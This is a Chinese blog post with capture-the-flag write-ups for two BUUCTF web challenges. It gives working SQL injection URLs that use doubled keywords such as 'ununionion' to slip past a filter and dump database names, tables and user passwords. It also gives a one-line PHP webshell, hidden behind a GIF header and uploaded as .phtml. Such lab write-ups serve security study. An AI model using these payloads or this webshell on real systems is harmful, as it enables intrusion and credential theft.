2021-01-21

于 2021-01-21 20:28:18 发布
阅读量104 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/112969356
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

【BUUCTF】 [极客大挑战2019] BabySQL

sql 注入 双写绕过
replace函数,找到union和select等替换为空

需要绕过的双写,单词中间拆开,分两半,里面藏一个完整的:

union
ununionion

select
seselectlect

from
frfromom

where
whwhereere

information
infoorrmation
(过滤了or)

order
oorrder
(过滤了or)

by
bbyy

常见URL编码
%20 空格

%23 #

%27 ’

1.尝试闭合标点符号引起报错
在这里插入图片描述
在这里插入图片描述
没有or,只有1=1,or被过滤了,双写
?username=admin&password=pwd %27 oorr 1=1 %23

by也被过滤了,双写
?username=admin&password=pwd %27 oorrder bbyy 3 %23
在这里插入图片描述
?username=admin&password=pwd %27 oorrder bbyy 4 %23
在这里插入图片描述
有三个字段

?username=admin&password=pwd ' union select 1 #

在这里插入图片描述
只讲了1# ,说明被检测到了union和select,双写联合查询看回显
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 #

在这里插入图片描述
不行…额,
#在这里必须用URL编码成%23,否则不行!
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23
在这里插入图片描述
爆库
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) %23
在这里插入图片描述

?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23
在这里插入图片描述

爆表
information被过滤了,双写
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
在这里插入图片描述

?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
在这里插入图片描述

选择爆列
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
在这里插入图片描述

查列
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23
在这里插入图片描述

[ACTF2020 新生赛]Upload

构造test.php(一句话木马),内容如下

GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称
在这里插入图片描述
再用中国蚁剑链接,查找目录完事
在这里插入图片描述

无尽星河-深空
关注
专栏目录
APToolV7200(2021-02-01)
12-13
APTool-UMPTooV7200 是一款专门用于量产chipsbank主控U盘的工具。这款工具的主要功能是对U盘进行量产操作,也就是通过制作U盘固件,将U盘的物理存储芯片的空间划分为分区,赋予U盘可读写和存储的功能。...
UL 142-2021-01-21.pdf
05-27
Steel Aboveground Tanks for Flammable and Combustible Liquids
第1章 树状树组-2021-01-21.pdf
01-22
- \( 2^0 \)[21, 21] ##### 2. 更新操作 树状数组的更新操作主要依赖于“lowbit”函数,该函数用于确定当前元素所属的子区间范围。具体地,对于给定的索引\( i \),其所属的最近的子区间长度为\( 2^k \),其中\( k...
minio-RELEASE.2023-01-31T02-24-19Z版本
02-08
新版本配置 export MINIO_ROOT_USER=admin export MINIO_ROOT_PASSWORD=12345678 原旧版本中的配置是MINIO_ACCESS_KEY和MINIO_SECRET_KEY,请注意别在各博客中直接复制把自己的配置写错了,新下载的minio是用不了旧...
WebIDE-UISimpleTC-2021-03-15T16-21-01.654Z-github
03-16
标题“WebIDE-UISimpleTC-2021-03-15T16-21-01.654Z-github”暗示这是一个与Web集成开发环境(WebIDE)相关的项目,可能是一个开源项目,存储在GitHub上。日期部分“2021-03-15T16-21-01.654Z”表示这个项目的某个...
Video_2021-01-09_124704.mp4
01-12
在线教育系统javaweb项目毕业设计
class_narwhal:2021-01-25全栈Python Day班
02-13
实验09-单位转换器实验10-平均数实验15-短语编号实验19-二十一点实验14-选择6 实验20-信用卡验证实验13-ROT13 组-Jackalope 实验18-峰谷实验22-ARI 实验21-数词 可选的Python实验室 练习1-5 实验01-08、11、12、17...
2021中国网络零售百强报告[2021-07-01](21页).pdf
05-20
2021中国网络零售百强报告》揭示了在数字化驱动下中国消费品零售市场的全新格局。这份报告详尽地分析了网络零售对于国内消费市场的关键影响,并提供了2021年度消费品零售数字化百强企业的深入洞察。 一、数字化...
精品专题资料(2021-2022年收藏)华中世纪星数控车床编程实例01:手柄精.doc
12-01
仿真软件是指华中世纪星数控车床的仿真软件HNC-21T。在本实例中,仿真软件是非常重要的,因为它可以模拟实际加工过程。 五、机床参数设置和刀具管理 在本实例中,机床参数设置是指对华中世纪星数控车床的参数设置...
App_Privacy_Report_v4_2021-10-10T01_29_09.ndjson
10-10
App_Privacy_Report_v4_2021-10-10T01_29_09.ndjson
SEMEVAL-2021-task6-corpus
05-21
v1.6.2 [2021/01/22] -释放了子任务1、2和3的开发数据的黄金标签 v1.6.1 [2021/01/22] -释放了子任务1、2和3的测试数据(200个新模因); 此外,增加了80个新的训练模因; 总共我们有687辆火车+ 63辆dev + 200辆测试...
SRA2021-G14-测试用例文档 V0.1.21
08-08
《SRA2021-G14-测试用例文档 V0.1.21》是一份详尽的测试文档,旨在确保社区团购App“优团”的功能完备性和用户体验。测试用例是软件质量保证的重要组成部分,它们是系统测试过程中预设的操作步骤,用于验证系统是否...
ZX02计算结果2021-07-011
08-08
文档"ZX02计算结果2021-07-011"涉及的是金融投资领域中的量化交易策略,特别是基于成交量择时的算法。在金融市场上,成交量是衡量市场活跃度的重要指标,通过分析成交量数据,投资者可以预测未来价格走势,制定相应...
建筑施工组织2021-21-某玻璃幕墙施工方案.doc
05-19
8. **大样详图**:详图如DY-01至DY-**,提供了具体的构造节点和工艺细节,有助于施工人员准确理解和执行施工任务。 综合来看,这份玻璃幕墙施工方案是一份全面的指导文件,包含了工程实施的各个环节,对于指导建筑...
CSP-J CSP-S 初赛模拟题_(C)-2021.09.01(G)--23页.pdf
09-01
21. Luogu CSP 2020 第一轮(初赛)模拟 题解&总结 该部分提供了Luogu CSP 2020第一轮(初赛)模拟题解和总结,涵盖了信息学的基础知识和编程技术。 22. [五年 CSP 三年模拟]洛谷 2020 初赛模拟赛分析 该部分提供了...
优质资料(2021-2022年收藏)数控铣床加工中心模拟试题一.doc
10-11
21. Fanuc 系统中,程序段 G04 P1000 中,P 指令是(C.暂停时间)。 22. Fanuc 系统中,已知 H01 中的值为 11,执行程序段 G90 G44 Z-18.0 H01 后,刀具实际运动到的位置是(C.Z -29.0)。 23. 在主程序中调用子...
App_Privacy_Report_v4_2021-10-11T21_01_54.ndjson
10-11
App_Privacy_Report_v4_2021-10-11T21_01_54.ndjson
教育教学说课模板2021-教育精选 (21).pptx
05-27
【教育教学说课模板2021-教育精选 (21).pptx】是一个专为教育工作者设计的PPT模板,适用于幼儿教育教师进行说课活动。说课是教学设计的一种形式,它要求教师系统地阐述课程的教学目标、教学内容、教学方法、教学过程...
techtorial-academy-session-02-01-21
02-12
【压缩包子文件的文件名称列表】"techtorial-academy-session-02-01-21-master"很可能包含了课程的所有资料,如讲义、代码示例、练习题、解决方案等。"master"通常用于表示主分支或主要版本,这可能意味着这是课程的...
id uid exam_id start_time submit_time score 1 1001 9001 2021-09-01 09:01:01 2021-09-01 09:51:01 78 2 1001 9002 2021-09-01 09:01:01 2021-09-01 09:31:00 81 3 1002 9002 2021-09-01 12:01:01 2021-09-01 12:31:01 81 4 1003 9001 2021-09-01 19:01:01 2021-09-01 19:59:01 86 5 1003 9002 2021-09-01 12:01:01 2021-09-01 12:31:51 89 6 1004 9002 2021-09-01 19:01:01 2021-09-01 19:30:01 85 7 1005 9001 2021-09-01 12:01:01 2021-09-01 12:31:02 85 8 1006 9001 2021-09-07 10:01:01 2021-09-07 10:21:01 84 9 1003 9001 2021-09-08 12:01:01 2021-09-08 12:11:01 40 10 1003 9002 2021-09-01 14:01:01 (NULL) (NULL) 11 1005 9001 2021-09-01 14:01:01 (NULL) (NULL) 12 1003 9003 2021-09-08 15:01:01 (NULL) (NULL) sql求时间差
最新发布
07-25
您可以使用 SQL 中的函数来计算时间差。假设您想要计算 start_time 和 submit_time 之间的时间差,可以使用以下语句: ```sql SELECT id, uid, exam_id, start_time, submit_time, score, EXTRACT(EPOCH FROM ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值